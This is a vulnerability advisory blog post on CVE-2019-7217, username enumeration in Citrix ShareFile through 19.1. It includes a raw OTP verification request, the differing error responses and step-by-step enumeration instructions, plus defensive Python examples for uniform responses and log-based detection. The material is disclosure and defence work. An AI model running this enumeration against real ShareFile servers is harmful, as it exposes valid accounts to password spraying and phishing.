Thursday, May 02, 2019

CVE-2019-7217: CITRIX SHAREFILE USER ENUMERATION

Today’s post highlights an unauthenticated username enumeration vulnerability discovered in Citrix ShareFile, affecting versions up to and including 19.1.

Citrix ShareFile Application v.19.1

This issue allows an attacker to determine whether specific usernames exist in the system by analyzing differences in server responses to OTP (One-Time Password) verification requests, without needing to log in.

For example, the server returns different error messages depending on the username’s registration status:

  • Registered Username:
            {"error": true, "errorMessage": "Unable to verify two factor code.", "errorCode": 122}
  • Unregistered Username:
            {"error": true, "errorMessage": "You are not authorized to use this client", "errorCode": 126}


Request RAW:

POST /oauth/oauthapi.aspx HTTP/1.1
Host: xxx.sharefile.eu
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://xxx.sharefile.eu/Authentication/Login
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Content-Length: 293
Connection: close

tool=oauth-webpop&fmt=json&op=webflow-verify&username=asd1%40test.com&subdomain=xxx&response_type=code&client_id=Dzi4UPUAg5l8beKdioecdcnmHUTWWln6&state=FxwxORudhXUqUh3phnC6Mg%3D%3D&redirect_uri=https%3A%2F%2Fxxx.sharefile.eu%2Flogin%2Foauthlogin&h=&requireV3=false&code=123


These behavioral discrepancies allow an unauthenticated attacker to distinguish valid from invalid usernames by analyzing the response to each OTP verification attempt.

This lack of uniformity creates an information disclosure vulnerability that violates secure authentication practices and enables silent reconnaissance.
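The following is an added example (not Citrix ShareFile code, and not the authors' proof of concept) that models the two behaviours side by side: a handler that answers with a different errorCode for unregistered users, exactly the discrepancy described above, and a hardened handler that returns one generic failure and does the same amount of work whether or not the username exists, so neither the body nor the timing of the response reveals account existence. The user store, OTP values and the DUMMY_OTP constant are constructed for the example.

```python
"""Uniform OTP verification responses (constructed example, not ShareFile code).

verify_otp_vulnerable() models the leaky behaviour from the post: the
errorCode differs for a registered versus an unregistered username.
verify_otp_hardened() returns the same failure for "no such user" and
"wrong code", and always runs the OTP comparison so the code path costs
the same in both cases.
"""
import hmac
import json

# Constructed user store: username -> current OTP (hypothetical values).
USERS = {
    "alice@example.com": "482913",
    "bob@example.com": "117340",
}

# Dummy OTP compared against for unknown users so the work done is constant.
DUMMY_OTP = "000000"


def verify_otp_vulnerable(username: str, code: str) -> dict:
    """Leaky handler: distinct responses for known and unknown usernames."""
    if username not in USERS:
        # Unregistered username -> errorCode 126 (as observed in the post).
        return {"error": True,
                "errorMessage": "You are not authorized to use this client",
                "errorCode": 126}
    if code != USERS[username]:
        # Registered username with a wrong code -> errorCode 122.
        return {"error": True,
                "errorMessage": "Unable to verify two factor code.",
                "errorCode": 122}
    return {"error": False}


def verify_otp_hardened(username: str, code: str) -> dict:
    """Same failure response and same work for unknown users and wrong codes."""
    user_exists = username in USERS
    expected = USERS.get(username, DUMMY_OTP)
    # compare_digest does not short-circuit on the first differing byte.
    code_ok = hmac.compare_digest(code.encode(), expected.encode())
    if user_exists and code_ok:
        return {"error": False}
    # One generic failure for every unsuccessful attempt; the errorCode value
    # here is chosen for the example and is not ShareFile's.
    return {"error": True,
            "errorMessage": "Unable to verify two factor code.",
            "errorCode": 122}


def responses_are_uniform(handler, usernames, code: str = "123") -> bool:
    """True if `handler` returns byte-identical failure bodies for every username."""
    bodies = {json.dumps(handler(u, code), sort_keys=True) for u in usernames}
    return len(bodies) == 1


if __name__ == "__main__":
    probe = ["alice@example.com", "nobody@example.com"]
    print("vulnerable uniform:", responses_are_uniform(verify_otp_vulnerable, probe))
    print("hardened uniform:  ", responses_are_uniform(verify_otp_hardened, probe))
```

The responses_are_uniform() check is the kind of regression test worth keeping next to an authentication endpoint: it probes the handler with a known and an unknown account and fails the build as soon as the two failure bodies diverge again.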


Exploitation Steps

The enumeration process is straightforward and does not require credentials:

  1. Prepare an OTP verification request, substituting in a username or email address from a target list.

  2. Send the request to the ShareFile server.

  3. Observe the response:

    • The server responds differently based on whether the specified username exists or not.

  4. Repeat the process with a list of possible usernames to compile a set of valid accounts.

This technique can be automated to quickly identify active accounts in the environment, setting the stage for follow-up attacks like password spraying or phishing.


Recommended Mitigations:

  • Standardize OTP verification responses for both valid and invalid usernames.

  • Implement rate limiting and alerting for failed OTP validation attempts.

  • Restrict unauthenticated access to OTP-related endpoints when possible.

  • Monitor logs for suspicious patterns of OTP submissions from untrusted sources.

  • Educate users about phishing risks and enforce multi-factor authentication (MFA).
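As an added example for the rate-limiting, alerting and log-monitoring items above (not part of the original post and not a Citrix tool), the script below flags sources that submit OTP verification attempts for many different usernames inside a short window, which is the footprint the enumeration described in this post leaves in application logs. The log format is constructed for the example (one key=value line per attempt, with timestamp, source address, op, submitted username and returned errorCode); the sample addresses, usernames and the thresholds are assumptions to adapt to real logs.

```python
"""Spotting username-enumeration patterns in OTP verification logs.

Constructed example. Each log line is assumed to look like:
  <ISO8601 UTC> src=<addr> op=<op> username=<user> errorCode=<n>
Only op=webflow-verify events (the operation seen in the post's request) are
considered; a source is flagged when it submits codes for at least
min_distinct_users different usernames within `window`.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

LOG_RE = re.compile(
    r"^(?P<ts>\S+) src=(?P<src>\S+) op=(?P<op>\S+) "
    r"username=(?P<user>\S+) errorCode=(?P<code>\d+)$"
)

# Constructed sample: one legitimate user retrying, one source sweeping a list.
SAMPLE_LOG = """
2019-05-02T10:00:01Z src=198.51.100.7 op=webflow-verify username=alice@example.com errorCode=122
2019-05-02T10:00:09Z src=198.51.100.7 op=webflow-verify username=alice@example.com errorCode=122
2019-05-02T10:00:30Z src=203.0.113.5 op=webflow-login username=asd0@test.com errorCode=0
2019-05-02T10:01:00Z src=203.0.113.5 op=webflow-verify username=asd1@test.com errorCode=126
2019-05-02T10:01:01Z src=203.0.113.5 op=webflow-verify username=asd2@test.com errorCode=126
2019-05-02T10:01:02Z src=203.0.113.5 op=webflow-verify username=bob@example.com errorCode=122
2019-05-02T10:01:03Z src=203.0.113.5 op=webflow-verify username=asd3@test.com errorCode=126
2019-05-02T10:01:04Z src=203.0.113.5 op=webflow-verify username=carol@example.com errorCode=122
2019-05-02T10:01:05Z src=203.0.113.5 op=webflow-verify username=asd4@test.com errorCode=126
2019-05-02T10:01:06Z src=203.0.113.5 op=webflow-verify username=asd5@test.com errorCode=126
2019-05-02T10:01:07Z src=203.0.113.5 op=webflow-verify username=asd6@test.com errorCode=126
this line is malformed and must be skipped
"""


def parse_line(line: str):
    """Parse one log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    return {
        "ts": datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ"),
        "src": m["src"],
        "op": m["op"],
        "user": m["user"],
        "code": int(m["code"]),
    }


def find_enumeration(lines, window=timedelta(minutes=5), min_distinct_users=5):
    """Return {src: (max_distinct_users, max_unregistered_hits)} for sources
    that verify OTPs for >= min_distinct_users usernames within `window`.
    The unregistered count uses errorCode 126, the value the post reports
    for unknown usernames, so a high share of 126 responses corroborates
    a sweep rather than a user mistyping their own address."""
    events = [e for e in map(parse_line, lines) if e and e["op"] == "webflow-verify"]
    events.sort(key=lambda e: e["ts"])
    per_src = defaultdict(deque)   # sliding window of recent events per source
    alerts = {}
    for e in events:
        q = per_src[e["src"]]
        q.append(e)
        while q and e["ts"] - q[0]["ts"] > window:
            q.popleft()
        distinct = {x["user"] for x in q}
        if len(distinct) >= min_distinct_users:
            unregistered = sum(1 for x in q if x["code"] == 126)
            prev = alerts.get(e["src"], (0, 0))
            alerts[e["src"]] = (max(prev[0], len(distinct)),
                                max(prev[1], unregistered))
    return alerts


if __name__ == "__main__":
    for src, (users, unreg) in find_enumeration(SAMPLE_LOG.splitlines()).items():
        print(f"{src}: {users} distinct usernames, {unreg} unregistered responses")
```

The same per-source window is what a rate limit on the endpoint should key on: counting distinct usernames per source, not just requests, is what separates a sweep from one user retrying their own code, and the errorCode split gives the analyst a second signal once the responses have been standardized and the code is no longer visible to the client.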


Conclusion:

This vulnerability in Citrix ShareFile (≤ 19.1) underscores the importance of consistent server-side handling of authentication-related operations. The ability to enumerate valid usernames without authentication creates unnecessary exposure and elevates the risk of follow-on attacks.


Reporting Information:

CVE Identifier: CVE-2019-7217
CVSS Score: 7.5
Affected Versions: Citrix ShareFile through 19.1
Tested on: Citrix ShareFile version 19.1
NIST: https://nvd.nist.gov/vuln/detail/CVE-2019-7217
Product URL: https://www.sharefile.com/
Reported by: Armando Huesca Prida, Andrea Pessione